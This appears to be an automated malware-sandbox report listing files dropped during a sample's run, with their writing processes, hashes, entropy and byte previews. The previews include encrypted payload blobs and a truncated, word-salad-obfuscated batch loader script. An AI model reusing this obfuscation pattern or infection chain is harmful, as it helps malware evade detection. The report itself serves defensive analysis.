                                                                                      SHA-512:C200196C26738DFA7013356656D281284928E256E423B11F679A71C3F8E75F04927474CC4AF853C2FE351F6051B084A902FD03D3106E14062634251EECFFF73F
                                                                                      Malicious:false
                                                                                      Preview:Korea........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B...........................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Missed

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):70656
                                                                                      Entropy (8bit):5.9158452815608795
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:qHsWccd0vtmgMbFuz08QuklMBNIimuzaAwus5:qLeAg0Fuz08XvBNbjaAts5
                                                                                      MD5:E6FE42ADC3082D12E845756426492B6E
                                                                                      SHA1:E1170EE049AB607162D1495B625AA74221AA8585
                                                                                      SHA-256:BFEA812CBDAFE08DF94D9C13CC6364F3BE76793E4676488338A17E2866BF8DFD
                                                                                      SHA-512:9E994CDCAF75089D9468BCC367FD9717F8F2F1FE10B181F0616C712A5674CACC7601421B72B1E50336F222CAAB392F09DB984C4671F5CAB8C1519102F4E4D6EC
                                                                                      Malicious:false
                                                                                      Preview:...?5.h!.....?.......?.......@.........................?..5.h!....>@...............................@................c.c.s...U.T.F.-.8...U.T.F.-.1.6.L.E.U.N.I.C.O.D.E.................................................................................8C......8C......0<......0<..+eG.W@..+eG.W@....B..?....B..?:;.....=:;.....=...t..?Z.fUUU.?...&WU.?{......?.......?.........9..B..@...2b....................................0<..0<.dW..dW................................@.......................................B.......B.................8..B..?0g.W..=.......................................?.......?......................0C......0C................................U....I.?.. ....u}.M.U..UUUUU.?Sz.....?........................................-DT.!.?.-DT.!..RUUUUU.?........v.F.$I.?.........3Y.E.?#Y...q...n.....?..;.9....../I.?hK.........d...?81.U.......H!G.?..#.$.....0|.f?.K.RVn...TUUUU.?........~I..$I.?.g......HB.;E.?.....q.....{.?.x...................................?...... @...... @.......?

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Next

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):98304
                                                                                      Entropy (8bit):7.9979666143694095
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:WdRAC50xWY7+r0weiORc8vTDzcvmgmQj21JVWAQfqB+ILeLBuQi2FUqAqT3Y4+/u:GvY7+rJenS8vTvcvHj2zVWxfq5Uu5pqn
                                                                                      MD5:52C875EB8A3EBC4643094465CDBB08D0
                                                                                      SHA1:013139AD7BBE0E2522CCC69EE890E63D8CA3FF3C
                                                                                      SHA-256:A363E5C9DD6872D625FDF1A6E957D0E08B4605E97D8130B0175A6889BE5196EC
                                                                                      SHA-512:97A6489038FF72109EA847A94C55DB9798F165E3D570F8677C6139C930DC67420BA783BE2F3939B74676C673D6AAA7EF2CAB107DBF7908A5CE228916FCDAAB0B
                                                                                      Malicious:false
                                                                                      Preview:....].Z...%.o....."7.;?..F.....x..=.[......F..&.P.P.f.1.xi$!..H..9..d$...E<.....t.3...........adW2.P.),CG.!f9.x:.."l..C'.......i.......;R........7...m.`..X.mH..T..].Te..c6...........E..u....8..k.#.ac...)..E.N:....B.NX..l..e.."...ytLW.;T.b./w...1TI)..<z."LH%+....R...N..v2...A.s...~.&=..4.....p..,.[v..#..F..-..._.. G,......HA.X.T...U.O[..J...h|...qX.....i.[a+X........Z..Q..........'Y...J."..:........W.m...e..+....?8/.z.._.....*....,.N....r.V/Q..N.z14.9....I..B... .S.7...."...'AC..)........Y.]^%r.TPd..k...'b..d.B.:.3.tX4..o%.p ...wNG2^/..i.>..E...^m...|X...RY.BI.q0.......Kdz.....-.l..b....].y..'..j.C...>...>0.0.[.!.xSk..;7V.......%.O..P...C...'O.sjT..,.S..'-.f..t6.'s.N.Z.^.{|.8.L.o;,.V...vC...B.p.X(T%..q..T..z....*......M.2.....?.MF.........sJ...8.....fp.\....^......."...6 ..Mw... k..v-.....B..$....E.ndEc...."...%...Swiltb....R.....^M../.........@6$c}.K..gp.R.O....s..E.$.d...r;....k.gdK2.(IG[.*.I...?.v.tfJ..9....+..*J.....g.....g.WK.....\

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Nr

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                                      File Type:ASCII text, with very long lines (975), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):23449
                                                                                      Entropy (8bit):5.134148367041093
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:b5EawfiYUKjpwVHqyl4PS5Riya68+DsfBL6pbHuwBl60YuyoVDKK3utLK5u+u0EC:bGawfr9Yxbriya68+YQZHuoE0Yxo73e+
                                                                                      MD5:9EF6EFA272560F1DEE8923508DAFE2C9
                                                                                      SHA1:7E6572FA616E8FE8AB67D2518F8685EB01F46923
                                                                                      SHA-256:3B887BAB036D30A1A4FB5C2C6B828F5EF3D8D5C1FF8D4147ED647ACB51AC808A
                                                                                      SHA-512:D17464F391FFC0CDB60D5A5669779343C4363130BC31E3902512ECEB5A139454992C00D1D8A9AA5D0BF142B904059E5F90A8804A1D2406FF398D893EA5804CF4
                                                                                      Malicious:false
                                                                                      Preview:Set Plug=4..ZQrEf-Bdsm-Janet-Dans-Genres-Census-Strips-Japan-Arrest-..wCAHostels-Incentives-Resolutions-Cave-Prefix-..QbtFancy-Biodiversity-..zLPetite-Holdem-Pam-Francis-Exchange-..CDeOffers-..iQSi-Sexuality-Sisters-..mTSPsychological-Changes-..ZhUgItself-Reverse-..MFVChips-Universities-..pyGMExample-Duncan-Vermont-Literally-Eh-Corresponding-..Set Catherine=9..QdHDivided-Onion-Treatment-Dan-..AtzaAttorneys-Participation-Miracle-Divine-Strongly-..YoRepeat-..TxVSFun-Counted-Transport-Miss-Settle-Receptors-Vulnerable-Distinguished-..yrpZStood-Isp-Supplies-Punch-Wayne-Ventures-..VcHas-Personalized-Encouraging-Thereof-..xkqAsthma-Campaigns-Taxi-Info-..KsJfRequirements-Cam-Says-Coast-Geo-..Set Diagnosis=J..KuSteering-Micro-Louisiana-Sur-..WnmrCorn-Producer-Perfume-Units-Releases-..LCCulture-Corruption-Wives-Departments-Hd-Autos-Electoral-Knowing-Hardwood-..WGNiBoolean-..lRrCPortraits-Desktops-Monthly-Weather-Fioricet-Targets-Conditions-Fox-R-..GMCenturies-Suit-Exchange-Buck-Sep-Inn-Hugo-As-R

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Nr.cmd (copy)

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                      File Type:ASCII text, with very long lines (975), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):23449
                                                                                      Entropy (8bit):5.134148367041093
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:b5EawfiYUKjpwVHqyl4PS5Riya68+DsfBL6pbHuwBl60YuyoVDKK3utLK5u+u0EC:bGawfr9Yxbriya68+YQZHuoE0Yxo73e+
                                                                                      MD5:9EF6EFA272560F1DEE8923508DAFE2C9
                                                                                      SHA1:7E6572FA616E8FE8AB67D2518F8685EB01F46923
                                                                                      SHA-256:3B887BAB036D30A1A4FB5C2C6B828F5EF3D8D5C1FF8D4147ED647ACB51AC808A
                                                                                      SHA-512:D17464F391FFC0CDB60D5A5669779343C4363130BC31E3902512ECEB5A139454992C00D1D8A9AA5D0BF142B904059E5F90A8804A1D2406FF398D893EA5804CF4
                                                                                      Malicious:false
                                                                                      Preview:Set Plug=4..ZQrEf-Bdsm-Janet-Dans-Genres-Census-Strips-Japan-Arrest-..wCAHostels-Incentives-Resolutions-Cave-Prefix-..QbtFancy-Biodiversity-..zLPetite-Holdem-Pam-Francis-Exchange-..CDeOffers-..iQSi-Sexuality-Sisters-..mTSPsychological-Changes-..ZhUgItself-Reverse-..MFVChips-Universities-..pyGMExample-Duncan-Vermont-Literally-Eh-Corresponding-..Set Catherine=9..QdHDivided-Onion-Treatment-Dan-..AtzaAttorneys-Participation-Miracle-Divine-Strongly-..YoRepeat-..TxVSFun-Counted-Transport-Miss-Settle-Receptors-Vulnerable-Distinguished-..yrpZStood-Isp-Supplies-Punch-Wayne-Ventures-..VcHas-Personalized-Encouraging-Thereof-..xkqAsthma-Campaigns-Taxi-Info-..KsJfRequirements-Cam-Says-Coast-Geo-..Set Diagnosis=J..KuSteering-Micro-Louisiana-Sur-..WnmrCorn-Producer-Perfume-Units-Releases-..LCCulture-Corruption-Wives-Departments-Hd-Autos-Electoral-Knowing-Hardwood-..WGNiBoolean-..lRrCPortraits-Desktops-Monthly-Weather-Fioricet-Targets-Conditions-Fox-R-..GMCenturies-Suit-Exchange-Buck-Sep-Inn-Hugo-As-R

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Protocol

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):43912
                                                                                      Entropy (8bit):7.0754478586730984
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:tBGmd9OTGQ1Dv7sMvLHfR/ZByLiFuO/ChgZ45VatJVEV3GPkjF:tBGmdATGODv7xvTphAiPChgZ2kOE6
                                                                                      MD5:28E6332970BFF06A0431BFEFBCD59462
                                                                                      SHA1:20902CDBF1A8D4DC081ADB967692C0C4ADD030BC
                                                                                      SHA-256:85C250563E37692A5A0188EAC2EE3E27D6A7DAB102E0200DF20D027B33DE8E91
                                                                                      SHA-512:CB1FB1F5A97E6A4F790D61E6964FFA4967591946DC03C639E944455DE893070547DA9B5401952DD5FA93FF66CF5F66F7A15F04913C41F4514A7DE067C8E6F60C
                                                                                      Malicious:false
                                                                                      Preview:..].........`...]...]...]...........0................]...]...]...]...]...]...]...]....................................p...]...]...]...]...p...................................................................................................0.........................0......................................................................................00......h..... ....................(.....00............ ....................h........... .A?....00.... ..%.... .... ............. .h...........(....... ...................................z`..y_..M,..6...).......,...:...nnn.jb..ZF..F).._@..9...eee..................................................................................................................................................................7............................................(.........(....... ...................................z`..y_..M,..6...).......,...:...nnn.jb..ZF..F).._@..9...eee.................................................................

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Realm

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):42495
                                                                                      Entropy (8bit):7.994847286020057
                                                                                      Encrypted:true
                                                                                      SSDEEP:768:0SLfZMdEvp3jxmff02Y0Vo91+u08R48OcPk4h+ZnWlJcCQbem8OU3VOmWZ:bZg02tV21q1P4h3wHAFOmWZ
                                                                                      MD5:062E20D07FE052044D9339A8B3F1CB38
                                                                                      SHA1:5428326E6D395EEBABEB3FFB1972AE6A8C3DA8AE
                                                                                      SHA-256:84DB270DF2972367E799A4F919E5033475A5395B9AD59F50456E340A980B693A
                                                                                      SHA-512:2EE25F17BB5BE528ABD2CE9FE4877BFA58B2D30A9503D22B31DD16C80A7B248D14142AAB42ACFFD0A069975490CF370435310E08187311365136680657D3BDF1
                                                                                      Malicious:false
                                                                                      Preview:.M<..l.v.;. FB.4.h{..I.....jo_..~6s..7..bM.}..V.&.o_Y..k..`.x..q...H....6u.`T."....t.v..D.d\tv..J............{.'....S..)..u.nCb.>.0g.uh'.A4.&#o..J..w...g.......eh.K.z...D)78.6.H.S..aP.]...|.....f...zDnlM3.......G\.M...3T..Ow.....z-3...Z,..L...k.\@....43.....j... .$r0H........+.....}..o#.h....t.L.U.X.).t....]&..@...I..".it...4..p].F.(,O.".{.>..s-._$...(.%ZKG.o.6xr|....8.Y...%..J.0.I...P....Io.....1;Z.u..uZ.e..Jr....$.I.{.W..l.....d.@C.`+L. .A.}W..d.X.c..)a.&.P.9 Y....R.R...?o..>......GX.D..i.{.m.?>..<..W+..s8.uK....D...H....Vk.la.X...w..D....t..k.HW....OA....~dU|^DC....D..>...{.t8,o....l.q.nXu.]=4...K.@[?wpn..nY...Q...A.$..=@G....J.O..H.~..:i....!...w..*A=".|.z.jcm........4T...o.,...c1~..B....Yz...8.5qu.<....H..&....[.n..3.=...-l6Z..s...i,0......*.T.{r...F.":. .......j.r-j'3.!....=..iE.oJ.^0;....q/z.]..u"I..X..d..m..Z..L...x....<..g.$...s.*......)..[G.......6.".....f.5.@{..!.+j..yf..iz...=...V.d........6...k.uE]6....Q...mV.i.FU.......v.w..

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Substantial

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):58368
                                                                                      Entropy (8bit):7.996685518527556
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:Kftiu0ideTjMGF6+YCYNRbYPUU1gqE1oe6kWjlu:958eTN6rCeYPz1gMeClu
                                                                                      MD5:734A793F9424DE731EEE480B610E0257
                                                                                      SHA1:DD2073F71258FC036517ED503B3F85FD8ECDFDA6
                                                                                      SHA-256:0915FFDD69CF4511B586769737D54C9FF5B53EDA730ECA7A4C15C5FF709315EC
                                                                                      SHA-512:194915FEEFA2E7D04F0683FD5AF0F37FC550F1A8F4883D80D4CE0E4B6E4091BD9049A52E0FB3E5D3DB872B711431E1D5E7800AA206E3B5654DFD1266FB452335
                                                                                      Malicious:false
                                                                                      Preview:|U.A&..).?.<.`...D0.3.!=H..Id.,....@r...X...{P.@O.^.G..i.N.d.;k.GjcuuwC.h....E%t.Z..:...T:.s"..',...<.."(._.zk`..|.U...*......L]....{.:.4.....z.!...<..m.3.3..lK..E.u..-..#S.l8.F.G....*.B .h.v..99.6P;..a..O.T..eK...q.j:.4...F\B>c.>r{...4..&U......./.qH...@..U..>...6.B...(d.8......`.L.N......r4.e...fp..X.....w....[K.g.|....om.,.z.Q...fdC..s..n.h...{F.h...,.j].z..?.^.Y.::.-+8....}W.....m..h.Q..Vo..1.g....M......i...R.v3.i29jdc...3\[:..r@.TbPN....pL..Xc.6/T..v..n_..0[........o....TE.`S...N....Kj6hamK...o.0_.H$..... .!a..?u.;.=..C..xp..[.s........O..b.H|....96h..V....??%......9.8.)..*.4L..J..R...9%..O.'..O= a.6..K.o.......}..F....M5e.....8.p.....kqq...eL.u%.....6.66M'n.Uz.....(...?vz.,.2VB'.....:h.#o.8..~..@.6.?m..5.....8....pFX$..M8.%q......`s...y.Nudh.........R...9W[..>%.6O.X.....G.....@...$../.<j.t2.O@r..x.{._.....c!....d%.".y....I.8I./........'q.F....@.+..h..c....j.x.m..M.q.).].c......q.o...ahn..c.-a......Y..+^.G....@.8.....;H..X..t

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Undefined

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):67584
                                                                                      Entropy (8bit):7.996945320826708
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:9bqjXKdCr6Qw/ljXmAZUNbHaQPc0osgAuB6mrQjh4GVnY4t8PwMU:9OadCretrniNX1osgAGrQh4GVY4ePwMU
                                                                                      MD5:10CF860D6ED7F8B77D7F02A407DDDE2C
                                                                                      SHA1:42C54FF8B32BD09B583E544837A65248AF7B60AB
                                                                                      SHA-256:A4E09DE3E94F24B4D2D780667569166F242486A7912706A58AB32CF88F547069
                                                                                      SHA-512:355179700261EE76D67CEFCC27A120CA636278636420DF8D5CCE965055CC05F5249F86230A4C1695FCD3DB4A9B91CFD0D1AF5E6723F3A9B396DB1F4B70EC0052
                                                                                      Malicious:false
                                                                                      Preview:>.m....\qG..........h......y(..].....b8.Bt>f)iW/m..'...=.~Z......?......n.'..1M..w.D.9. .u.y.Ta+...$..Q.v..8........O..X..K.W.....x.".E.."g....9.fk.#.=.....:.OB..7..Tf.4...1AK..}..Y..?..)...V..Jr.v...9...!.2..i.B.!....ji..&.e...Q...*;..k..U11.ov..I.....{q.\.T&.#..r.9.(v-r../....}.T......f..J..%.|u...A..&...S[s....4.j$P..PV..M..s.739$...}..W{.f..&....A..h.....Ye.v......!.+.F.E.1.e...c.....i....D..n.&..g.d....Hx\....b.......N..0.^..O...@j....'..Z.~......w}....g...c....V..b......t..%.....].`@e.`...._......vX.A._....?...Pp.DG.7m.R..4G3@....uy...;L'..II{*....M...Fv.[..<.Vm".....P.w.\......%.kY.^.L[..h.s..`..E.>....g..^.. 8.*..#.[HY@.8.......N.7...m....T...<."}H..3.!.9N$..,.bF.@.......nkP.8.R.-J.~K..<.,...f.vL..........YPA...LHl5\..H....c..G."h..s..X..X.......8...U....,..s`.i......E...o.C'.&+.Lb.&......[t1..>..`t......&`CE.9=..m4..3f|.Y@X..,.u.C.o~....L.E....2.K..}..*;....e....w...U...L...7#.|..`5g.x<....../.]^.j.,y.#W.....B\.y

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):21979
                                                                                      Entropy (8bit):5.049158677118914
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:aPVoGIpN6KQkj2qkjh4iUxehQVlardFWgxOdB2tAHkDNXp5pNSSme+vOjJiYo0ik:aPV3IpNBQkj2Ph4iUxehYlardFWgxOdm
                                                                                      MD5:E85ADBB7806D6C2B446681F25E86C54E
                                                                                      SHA1:7945DA1DD2CC4F96AD9DD6E40803842C3497B0C0
                                                                                      SHA-256:1DE8C1E231A1C77FB42123C0362070540F9692F0A3E4EA5141C6F8EE8DE8EBF5
                                                                                      SHA-512:D60A6998458E9D2FB6F6345306DA7CB679E8A8202270B1C31519FFD017C102D7B46A7FD98011577784E2ADA33C0FCCA138EA1BB68C4260E45FA3BAFC307A60D3
                                                                                      Malicious:false
                                                                                      Preview:PSMODULECACHE.......CB.z..q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...Reset-DAClientExperienceConfiguration........Remove-DAEntryPointTableItem........New-DAEntryPointTableItem....#...Get-DAClientExperienceConfiguration....#...Disable-DAManualEntryPointSelection........Rename-DAEntryPointTableItem...............?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1........Import-IseSnippet........Get-IseSnippet........New-IseSnippet..........?T.z..C...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\iSCSI\iSCSI.psd1........Register-IscsiSession........New-IscsiTargetPortal........Get-IscsiTarget........Connect-IscsiTarget........Get-IscsiConnection........Get-IscsiSession........Remove-IscsiTargetPortal.....

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):64
                                                                                      Entropy (8bit):0.34726597513537405
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Nlll:Nll
                                                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                      Malicious:false
                                                                                      Preview:@...e...........................................................

                                                                                      C:\Users\user\AppData\Local\Temp\MSIef207.LOG

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):246
                                                                                      Entropy (8bit):3.498421423848992
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K88ClErNZH:Qw946cPbiOxDlbYnuRKdDrNJ
                                                                                      MD5:7DDAB26AB5FE3057C3B881EBD245BB0E
                                                                                      SHA1:D6A7A5A6161E5E6737CAE769917BEA6FC2DFC0F2
                                                                                      SHA-256:3C6BA64F05E0E11398E081ADCF077167505AFB51D0FC06AC1296BB1B71D714F3
                                                                                      SHA-512:85D08EAB1F393F1FCBE4D67CF880E45D1B5C943E936DFA75CB4E9A1C1975F6F296AC2DC7C921E34A409C67051A95F6BF841E23EBC46B0BC873673874C6820ABA
                                                                                      Malicious:false
                                                                                      Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.1./.0.1./.2.0.2.5. . .1.6.:.5.3.:.1.1. .=.=.=.....

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_buefs2yl.gk3.ps1

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dr3guk4g.nlo.psm1

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dstdknzp.aez.psm1

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_op3s243m.ths.psm1

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qjtlux3e.1jx.psm1

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sjcjkgqn.x4u.ps1

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vkxsjhxu.4oy.ps1

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vtm2w1bd.swg.ps1

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
